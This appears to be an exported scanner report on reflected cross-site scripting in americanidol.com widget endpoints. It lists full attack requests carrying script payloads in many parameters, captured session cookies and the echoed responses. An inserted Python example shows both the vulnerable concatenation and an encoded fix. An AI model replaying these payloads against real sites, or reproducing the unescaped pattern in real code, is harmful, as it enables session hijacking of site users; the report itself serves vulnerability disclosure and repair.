Path:   /js/recentActivity/view

Issue detail

The value of the cookieFailInstantRedirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49218'><script>alert(1)</script>32d40dc9b9 was submitted in the cookieFailInstantRedirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true49218'><script>alert(1)</script>32d40dc9b9&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:32 GMT
Content-Length: 1517
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true49218'><script>alert(1)</script>32d40dc9b9&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.87. http://widgets.myidol.americanidol.com/js/recentActivity/view [devkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the devkey request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 48fc0'><script>alert(1)</script>41365e5e216 was submitted in the devkey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey48fc0'><script>alert(1)</script>41365e5e216&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:30 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey48fc0'><script>alert(1)</script>41365e5e216&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.88. http://widgets.myidol.americanidol.com/js/recentActivity/view [ms parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25fee'><script>alert(1)</script>0b8b3d804a3 was submitted in the ms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=131775876625fee'><script>alert(1)</script>0b8b3d804a3 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:46 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
ntActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=131775876625fee'><script>alert(1)</script>0b8b3d804a3'>
...[SNIP]...

1.89. http://widgets.myidol.americanidol.com/js/recentActivity/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 872cd'><script>alert(1)</script>287b5cb03b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766&872cd'><script>alert(1)</script>287b5cb03b8=1 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:10:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:09 GMT
Content-Length: 1521
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
tActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766&872cd'><script>alert(1)</script>287b5cb03b8=1'>
...[SNIP]...

1.90. http://widgets.myidol.americanidol.com/js/recentActivity/view [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the num request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3c22'><script>alert(1)</script>21135ca7561 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10f3c22'><script>alert(1)</script>21135ca7561&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:34 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10f3c22'><script>alert(1)</script>21135ca7561&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.91. http://widgets.myidol.americanidol.com/js/recentActivity/view [one_widget_node parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the one_widget_node request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d0f1d'><script>alert(1)</script>fde0836013d was submitted in the one_widget_node parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.comd0f1d'><script>alert(1)</script>fde0836013d&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:28 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.comd0f1d'><script>alert(1)</script>fde0836013d&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.92. http://widgets.myidol.americanidol.com/js/recentActivity/view [title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the title request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7706'><script>alert(1)</script>7290e7f0327 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Networkd7706'><script>alert(1)</script>7290e7f0327&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:39 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Networkd7706'><script>alert(1)</script>7290e7f0327&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.93. http://widgets.myidol.americanidol.com/js/recentActivity/view [view parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the view request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 164ca'><script>alert(1)</script>ec7852c134f was submitted in the view parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network164ca'><script>alert(1)</script>ec7852c134f&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:37 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network164ca'><script>alert(1)</script>ec7852c134f&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.94. http://widgets.myidol.americanidol.com/js/recentActivity/view [wurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of the wurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 91654'><script>alert(1)</script>9ce9e213cbe was submitted in the wurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/91654'><script>alert(1)</script>9ce9e213cbe&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:43 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
ol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/91654'><script>alert(1)</script>9ce9e213cbe&ms=1317758766'>
...[SNIP]...

1.95. http://widgets.myidol.americanidol.com/redirect.one [redirect_to parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /redirect.one

Issue detail

The value of the redirect_to request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c05ca'><script>alert(1)</script>4c9652dc110 was submitted in the redirect_to parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
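The attribute-context breakout above, and the two fixes a practitioner would apply, as an added Python example that is not part of the report or of the americanidol.com application. The scanner's redirect_to value is taken from the request shown for this issue; the allow-list of hosts and the link prefix are assumptions, since the page does not show how the application builds the link or whether it validates the target.

```python
import html
from urllib.parse import quote, urlsplit

# Constructed from the report: the value the scanner sent in redirect_to (issue 1.95).
SCANNER_PAYLOAD = "http://www.americanidol.com/c05ca'><script>alert(1)</script>4c9652dc110"

# Hypothetical values; the real allow-list and link prefix are not on the page.
ALLOWED_HOSTS = {"www.americanidol.com"}
LINK_PREFIX = "http://widgets.myidol.americanidol.com/redirect.one?redirect_to="


def vulnerable_link(redirect_to: str) -> str:
    """Reproduces the echoed markup in the report: the raw value is concatenated
    into a single-quoted href, so a ' in the value ends the attribute and the
    following > ends the tag."""
    return f"<a href='{LINK_PREFIX}{redirect_to}'>"


def is_allowed_target(redirect_to: str) -> bool:
    """Structural check on the redirect target: an absolute http(s) URL whose host
    is on the allow-list. Rejects javascript:, data:, scheme-relative //host and
    anything else that is not a plain web URL to a known host."""
    parts = urlsplit(redirect_to)
    return parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS


def safe_link(redirect_to: str) -> str:
    """Two independent layers. The target is validated first, but validation alone
    does not stop this finding: the scanner's payload has an allowed host and
    carries the script in its path. So the value is also encoded for each context
    it crosses: URL-encoded as a query-string value, then HTML-escaped for the
    single-quoted attribute (quote=True turns ' into &#x27;)."""
    if not is_allowed_target(redirect_to):
        raise ValueError("redirect target not allowed")
    encoded = quote(redirect_to, safe="")  # ' -> %27, < -> %3C, / -> %2F ...
    return f"<a href='{html.escape(LINK_PREFIX + encoded, quote=True)}'>"
```

The host check is there because a parameter named redirect_to is also an open-redirect candidate; it is a separate control, and the assertion that the scanner's own payload passes it is the point: output encoding for the attribute is what closes the XSS, the allow-list only narrows where the redirect can go.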

Request

GET /redirect.one?redirect_to=http://www.americanidol.com/c05ca'><script>alert(1)</script>4c9652dc110 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
